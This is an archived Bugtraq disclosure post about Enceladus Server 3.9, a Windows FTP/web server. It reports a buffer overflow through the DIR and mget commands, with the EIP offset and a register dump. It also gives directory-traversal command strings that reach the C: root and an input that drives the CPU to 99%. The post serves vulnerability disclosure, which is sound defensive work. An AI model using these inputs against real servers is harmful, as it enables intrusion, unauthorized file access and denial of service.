Multiple vulnerability in Enceladus Server

From: securma massine (securma@caramail.com)
Date: 12/19/02

  • Next message: Dmitry Guyvoronsky: "Openwebmail 1.71 remote root compromise"
    From: securma massine <securma@caramail.com>
    To: bugtraq@securityfocus.com
    Date: Thu, 19 Dec 2002 15:24:58 GMT+1
    
    
    

    hi
    Enceladus Server Suite is an Internet/Intranet lightweight Web and
    FTP Server for
    Windows, the version 3.9 according to mollensoft "Includes a fix to
    the directory traversal vulnerability... ( This is a CRITICAL
    SECURITY UPDATE)"
    http://www.mollensoft.com/
    I found several vulnerability critical concerning this server
    1-buffer overflow and remote code execution:
    tamer notified that the waiter crashait with "long sequence of
    characters as an argument to "CD" command"
    (http://online.securityfocus.com/archive/1/302596)..I believe that
    it passed dimensioned of a true buffer overflow because this crash
    allows only a overwrite ' ESP and thusune simple attaque DOS
    50e091e3 803820 cmp byte ptr [eax],0x20
    (ftpservx.dll)
    with argument "DIR" we can overwrite eip
    dir+[buffer =279byte] >> eip is overwritet at:42,43,44,45
     sufficient for the injection of a shellcode
    the state of the registers is:

    Access violation - code c0000005 (first chance)
    eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5 esi=0012bce0
    edi=0019affd
    eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl
    zr na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
    efl=00000246
    61616161 ?? ???

    it is noticed whereas the eip is at the beginning of our buffer
    ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=4BYTE]
    aaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    the argument "mget" gives also the same result
    the exploit is simple of realization since ebx point towards our
    buffer
    0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61

    2- directory traversal

    ftp>cd ..
    access denied
    ftp>cd cd @/....\
    250 CWD command successful.
    ftp> dir
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-
    ftp
    drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
    -rwxr-xr-x 1 User Group 8544 Mar 18 02:09
    emailme.html
    -rwxr-xr-x 1 User Group 878 Mar 16 04:52
    execupload.html
    -rwxr-xr-x 1 User Group 1033 Oct 27 02:22
    exitstatus.html
    -rwxr-xr-x 1 User Group 5965 Mar 18 02:12
    fileuplogin.html
    drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
    drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
    -rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
    -rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
    -rwxr-xr-x 1 User Group 1299 Mar 18 23:41
    mailexitstatus.html
    -rwxr-xr-x 1 User Group 4402 Mar 18 02:09
    MyPictures.html
    drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-
    downloads
    -rwxr-xr-x 1 User Group 5082 Mar 18 02:09
    signguestbook.html
    -rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
    ftp> cd @@@@@@@@@@@/..c:\
    250 CWD command successful.
    ftp> dir
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> pwd
    257 "c:/" is current directory.
    ftp> dir

    [NO COMMENT]

    3-denial of service and consume cpu
    ftp> cd @/..@/..
    (no reponse)
    cpu 99% used

    securma massine

    _________________________________________________________
    Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
    (0,35€ Hors coût du SMS)



    Relevant Pages

    • [NT] Windows FTP Client Allows File Transfer Location Tampering (MS05-044)
      ... Get your security news from a reliable source. ... A tampering vulnerability exists in the Windows FTP client. ... * Microsoft Windows Server 2003 for Itanium-based Systems - ...
      (Securiteam)
    • Re: JS_SQLSPIDA.B
      ... some vulnerabilty somewhere on your system [typically IIS web or FTP ... services] to set up an FTP server. ... You'll also want to find and patch whatever vulnerability it is that you ... have, starting with www.microsoft.com/security checklists, installing all ...
      (microsoft.public.win2000.security)
    • Directory Traversal Vulnerability in TwinFTP Server allows overwriting
      ... Directory Traversal Vulnerability in TwinFTP Server allows overwriting ... TwinFTP Server is a FTP server released by ...
      (Bugtraq)
    • [NT] Microsoft wininet.dll FTP Reply Null Termination Heap Corruption Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft 'wininet.dll' FTP Reply Null Termination Heap Corruption ... Windows Server 2003 Enterprise Edition SP1 ... This vulnerability appears to have existed from at least Internet ...
      (Securiteam)
    • Help with IPFW + NATD + Passive FTP
      ... passive FTP connections through IPFW with NATD enabled. ... $cmd 005 allow all from any to any via dc0 ... # Interface facing Public internet ... # Allow out access to my ISP's Domain name server. ...
      (freebsd-questions)